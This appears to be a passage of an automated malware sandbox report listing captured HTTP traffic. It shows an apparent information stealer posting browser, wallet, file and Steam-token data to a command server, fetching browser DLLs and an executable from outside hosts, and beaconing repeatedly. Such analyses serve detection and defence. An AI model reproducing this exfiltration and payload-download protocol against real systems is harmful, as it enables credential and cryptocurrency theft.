00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIDGCGCBFBAKFHIJDBAHost: 85.28.47.30Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 44 47 43 47 43 42 46 42 41 4b 46 48 49 4a 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 36 39 31 37 45 39 36 37 44 32 31 33 38 35 39 31 33 37 30 34 39 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 44 47 43 47 43 42 46 42 41 4b 46 48 49 4a 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4e 69 63 65 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 44 47 43 47 43 42 46 42 41 4b 46 48 49 4a 44 42 41 2d 2d 0d 0a Data Ascii: ------HIIDGCGCBFBAKFHIJDBAContent-Disposition: form-data; name="hwid"66917E967D213859137049------HIIDGCGCBFBAKFHIJDBAContent-Disposition: form-data; name="build"Nice------HIIDGCGCBFBAKFHIJDBA--
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFHDHJKKJDHJJJJKEGHHost: 85.28.47.30Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 30 39 61 66 34 33 33 66 30 63 36 34 64 35 62 66 30 65 63 32 33 31 62 35 63 62 37 35 33 31 39 36 31 33 34 32 38 63 32 34 63 35 31 34 37 62 32 63 62 39 65 32 35 64 35 65 61 37 30 32 30 33 31 65 63 32 62 61 66 62 36 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 2d 2d 0d 0a Data Ascii: ------DBFHDHJKKJDHJJJJKEGHContent-Disposition: form-data; name="token"c09af433f0c64d5bf0ec231b5cb75319613428c24c5147b2cb9e25d5ea702031ec2bafb6------DBFHDHJKKJDHJJJJKEGHContent-Disposition: form-data; name="message"browsers------DBFHDHJKKJDHJJJJKEGH--
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEHCGDBFCBAKECBKKEBHost: 85.28.47.30Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 48 43 47 44 42 46 43 42 41 4b 45 43 42 4b 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 30 39 61 66 34 33 33 66 30 63 36 34 64 35 62 66 30 65 63 32 33 31 62 35 63 62 37 35 33 31 39 36 31 33 34 32 38 63 32 34 63 35 31 34 37 62 32 63 62 39 65 32 35 64 35 65 61 37 30 32 30 33 31 65 63 32 62 61 66 62 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 48 43 47 44 42 46 43 42 41 4b 45 43 42 4b 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 48 43 47 44 42 46 43 42 41 4b 45 43 42 4b 4b 45 42 2d 2d 0d 0a Data Ascii: ------KJEHCGDBFCBAKECBKKEBContent-Disposition: form-data; name="token"c09af433f0c64d5bf0ec231b5cb75319613428c24c5147b2cb9e25d5ea702031ec2bafb6------KJEHCGDBFCBAKECBKKEBContent-Disposition: form-data; name="message"plugins------KJEHCGDBFCBAKECBKKEB--
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAAAFBGDBKKEBGCFCBFHost: 85.28.47.30Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 30 39 61 66 34 33 33 66 30 63 36 34 64 35 62 66 30 65 63 32 33 31 62 35 63 62 37 35 33 31 39 36 31 33 34 32 38 63 32 34 63 35 31 34 37 62 32 63 62 39 65 32 35 64 35 65 61 37 30 32 30 33 31 65 63 32 62 61 66 62 36 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 2d 2d 0d 0a Data Ascii: ------EBAAAFBGDBKKEBGCFCBFContent-Disposition: form-data; name="token"c09af433f0c64d5bf0ec231b5cb75319613428c24c5147b2cb9e25d5ea702031ec2bafb6------EBAAAFBGDBKKEBGCFCBFContent-Disposition: form-data; name="message"fplugins------EBAAAFBGDBKKEBGCFCBF--
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGIDHost: 85.28.47.30Content-Length: 6407Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIIECAAKECFHIECBKJDHHost: 85.28.47.30Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKEHDGDGHCBGCAKFIIIEHost: 85.28.47.30Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAEBFIJKEBGHIDHIEGIHost: 85.28.47.30Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 30 39 61 66 34 33 33 66 30 63 36 34 64 35 62 66 30 65 63 32 33 31 62 35 63 62 37 35 33 31 39 36 31 33 34 32 38 63 32 34 63 35 31 34 37 62 32 63 62 39 65 32 35 64 35 65 61 37 30 32 30 33 31 65 63 32 62 61 66 62 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 2d 2d 0d 0a Data Ascii: ------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="token"c09af433f0c64d5bf0ec231b5cb75319613428c24c5147b2cb9e25d5ea702031ec2bafb6------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="file"------FCAEBFIJKEBGHIDHIEGI--
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCFIDAFBFBAKFHJEGIJHost: 85.28.47.30Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 30 39 61 66 34 33 33 66 30 63 36 34 64 35 62 66 30 65 63 32 33 31 62 35 63 62 37 35 33 31 39 36 31 33 34 32 38 63 32 34 63 35 31 34 37 62 32 63 62 39 65 32 35 64 35 65 61 37 30 32 30 33 31 65 63 32 62 61 66 62 36 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 2d 2d 0d 0a Data Ascii: ------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="token"c09af433f0c64d5bf0ec231b5cb75319613428c24c5147b2cb9e25d5ea702031ec2bafb6------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="file"------EGCFIDAFBFBAKFHJEGIJ--
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEGCAAKFBAEGDGCBGCGHHost: 85.28.47.30Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAAEHJDBKJJKFHJEBKFHost: 85.28.47.30Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 30 39 61 66 34 33 33 66 30 63 36 34 64 35 62 66 30 65 63 32 33 31 62 35 63 62 37 35 33 31 39 36 31 33 34 32 38 63 32 34 63 35 31 34 37 62 32 63 62 39 65 32 35 64 35 65 61 37 30 32 30 33 31 65 63 32 62 61 66 62 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 2d 2d 0d 0a Data Ascii: ------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="token"c09af433f0c64d5bf0ec231b5cb75319613428c24c5147b2cb9e25d5ea702031ec2bafb6------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="message"wallets------FCAAEHJDBKJJKFHJEBKF--
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBKFBFCGIEHIDGCFBFBHost: 85.28.47.30Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 42 46 43 47 49 45 48 49 44 47 43 46 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 30 39 61 66 34 33 33 66 30 63 36 34 64 35 62 66 30 65 63 32 33 31 62 35 63 62 37 35 33 31 39 36 31 33 34 32 38 63 32 34 63 35 31 34 37 62 32 63 62 39 65 32 35 64 35 65 61 37 30 32 30 33 31 65 63 32 62 61 66 62 36 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 42 46 43 47 49 45 48 49 44 47 43 46 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 42 46 43 47 49 45 48 49 44 47 43 46 42 46 42 2d 2d 0d 0a Data Ascii: ------GCBKFBFCGIEHIDGCFBFBContent-Disposition: form-data; name="token"c09af433f0c64d5bf0ec231b5cb75319613428c24c5147b2cb9e25d5ea702031ec2bafb6------GCBKFBFCGIEHIDGCFBFBContent-Disposition: form-data; name="message"files------GCBKFBFCGIEHIDGCFBFB--
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECBGIDAEHCGDGCBKEBGHost: 85.28.47.30Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 30 39 61 66 34 33 33 66 30 63 36 34 64 35 62 66 30 65 63 32 33 31 62 35 63 62 37 35 33 31 39 36 31 33 34 32 38 63 32 34 63 35 31 34 37 62 32 63 62 39 65 32 35 64 35 65 61 37 30 32 30 33 31 65 63 32 62 61 66 62 36 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 2d 2d 0d 0a Data Ascii: ------IECBGIDAEHCGDGCBKEBGContent-Disposition: form-data; name="token"c09af433f0c64d5bf0ec231b5cb75319613428c24c5147b2cb9e25d5ea702031ec2bafb6------IECBGIDAEHCGDGCBKEBGContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IECBGIDAEHCGDGCBKEBGContent-Disposition: form-data; name="file"------IECBGIDAEHCGDGCBKEBG--
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAAEHJDBKJJKFHJEBKFHost: 85.28.47.30Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 30 39 61 66 34 33 33 66 30 63 36 34 64 35 62 66 30 65 63 32 33 31 62 35 63 62 37 35 33 31 39 36 31 33 34 32 38 63 32 34 63 35 31 34 37 62 32 63 62 39 65 32 35 64 35 65 61 37 30 32 30 33 31 65 63 32 62 61 66 62 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 2d 2d 0d 0a Data Ascii: ------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="token"c09af433f0c64d5bf0ec231b5cb75319613428c24c5147b2cb9e25d5ea702031ec2bafb6------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="message"jbdtaijovg------FCAAEHJDBKJJKFHJEBKF--
                        Source: global trafficHTTP traffic detected: GET /mine/amadka.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
